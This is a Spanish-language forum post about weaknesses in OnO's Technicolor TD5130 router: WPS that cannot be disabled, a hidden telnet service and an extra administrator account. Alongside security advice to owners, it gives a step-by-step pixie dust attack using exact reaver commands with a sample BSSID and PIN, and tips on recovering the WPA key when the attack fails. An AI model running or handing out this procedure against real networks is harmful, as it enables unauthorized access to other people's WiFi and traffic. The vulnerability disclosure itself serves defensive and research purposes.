Foro Wifi-libre.com

Technicolor TD5130 de OnO: La brecha WPS se convierte en una puerta trasera permanente

  ¡Buenas tardes!
Hace un par de días atrás encontré  un TD5130
Es un router fabricado por Technicolor (ex Thomson) y empleado por OnO.
El eSSID por defecto de estas redes es ONOXXXXXX dónde los X corresponden a la segunda mitad del bSSID. 
Es muy parecido al Technicolor  TG784 nv3 empelado por jazztell con un nivel de prestaciones inferior

La primera impresión no ha sido excelente: 
   - No tiene un puerto WAN,
   - No lleva antena externa
   - Sus puertos Ethernet son de 100Mbps. 
   - WiFi MIMO 1T1R  hasta 150Mbps... un poco triste.
Mañana dejaré fotos, de momento solo pongo solo la de la etiqueta con los datos por defectos.

Mi pulso no es perfecto pero se ven los datos y se muy claramente el logo del WPS con el PIN por defecto del router.
   Es imposible no verlo
La etiqueta lleva el siglo de OnO, el esid por defecto de OnO y han imprimido muy claramente el PIN WPS.
 
  Primera mala sorpresa: Accediendo a la interfaz de configuración (como administrador) me doy cuenta de que no hay WPS. .
  ¡Es el WPS fantasma! ¡Llamad a cuatro milenio!....  ¡Está aquí pero no está aquí!

  No hay forma de deshabilitar el WPS o de cambiar el PIN.
   El modelo "superior" empleado por jazztell tiene una interfaz idéntica, sin traducir, y con una diferencia: Tiene una casilla más en "seguridad" para deshabilitar el WPS:

Tenemos un problema.

  Navegando en la interfaz se ve que tiene muchas opciones truncadas/capadas,
Es por ejemplo imposible configurar el firewall pasando por la interfaz web:

  Estamos muy limitados...

WPS sí... ¡O sí!

  Segunda sorpresa:

  Digo que es una sorpresa ya que, lo habéis probablemente intuido, no hay nada en la interfaz relacionado de cerca o de lejos con un eventual servicio telnet.
  Después el WPS fantasma les presento el telnet fantasma:

  El dibujito está muy chulo.
  Con el telnet fantasma podemos hacer más cosas que con la interfaz de gestión web.
Podemos por ejemplo crear reglas para el firewall (o sea... usar el firewall)
¡Genial!
¡Que divertido es configurar un firewall en linea de comandos con una cli telnet desconocida!
  El problema es que seguimos en las mismas, sin poder configurar o deshabilitar el WPS:

  Otra sorpresa, el router tiene una segunda cuenta de administrador habilitada:

  Una aberración más.
  En fin, queda claro que no puedo desactivar el WPS ni por las malas, ni por las buenas... WPS or die!...

Un wps "compatible" con pixie wps en modo 3 (realtek)

  Según la wiki devi el router lleva un chipset RTL8188RE (ver Technicolor TD5130v1)
Tendré que abrirlo para confirmar esto. Lo haré mañana con la luz del día y tomaré de paso algunas fotos.
  Tenemos a un chipset realteck. Esto induce que es potencialmente vulnerable a un ataque pixie dust...
  Ya no hablo de sorpresa, el router sale en wash:

Si usamos airodsump-ng con el tag --manufacturer podemos ver que el rango de bSSID está atribuido a "Cameo"
    No me pregunten el porqué.

 18:17:25:31:F8:74  -22  67      110        0    0   1  54e  WPA2 CCMP   PSK  1.0 DISP,PBC  ONO31F874         Cameo Communications, Inc. 

  Lanzo un ataque reaver con pixiewps:

sudo reaver -i wlan1mon -b 18:17:25:34:0D:16 -c 1 -K 1 -vvv -Z -d 0

Notar que el modelo se anuncia en los PROBES, es fácil identificar los:

[P] WPS Manufacturer: Technicolor
[P] WPS Model Name: TD5130
[P] WPS Model Number: TD5130
[P] Access Point Serial Number: 1416A1D04123
[+] Received M1 message

  No se puede dar otro consejo que dejar de usar el WiFi del TD5130.
     Su red será siempre insegura.
También se debe borrar inmediatamente la segunda cuenta de administrador y obviamente cambiar la contraseña de la cuenta "admin" ( por defecto es "admin") 
    Esto son cosas que saltan a la vista.
No sé si hay exploits para la interfaz de administración o para este cliente telenet o si se podría pasar por ftp (el puerto está abierto)
   Creo que si tienes unos de estos es mejor jubilarlo.
  Parece que los TD5310 OnO salen solo en este rango de bSSID: 18:17:25:

¡Ya está!
Si el intercambio WPS toma más de un segundo se requiere un brute force "semilla tiempo"  (unos cuantos minutos)
Como podéis ver en la captura que sigue he obtenido el PIN que sale en la etiqueta:

Quien posee el PIN posee el mundo...

Antes de concluir este post quiero insistir en dos puntos para llevar el ataque con reaver:

1. Se lanza reaver una primera vez con el opción -K 1 para hacer el ataque pixie dust automático y con el argumento -Z para que reaver se parre después derivar el PIN. Ejemplo:

   sudo reaver -i wlan1mon -b 18:17:25:31:F8:74 -c 1 -vvv -K 1 -Z

2. Volvemos a ejecutar reaver con el pin encontrado (opción -p) y con el parámetro -n. Ejemplo:

   sudo reaver -i wlan1mon -b 18:17:25:31:F8:74 -c 1 -vv -p 75734374 -n

  Si lo hacéis sin pausa (-Z) no tendréis la llave: Se necesita el argumento -n y reaver no lo emplea en la sintaxis utilizada para mandar el PIN
Última cosa: puede ser necesario repetir el ataque, a veces el PIN no sale con el brute force completo. Repetir la maniobra y acabará saliendo.
  Voy a escribir a wiire para que veamos si se puede hacer algo al respecto.
¡Buenas noches [email protected]!

Ultima edición por kcdtv (15-03-2017 07:54:43)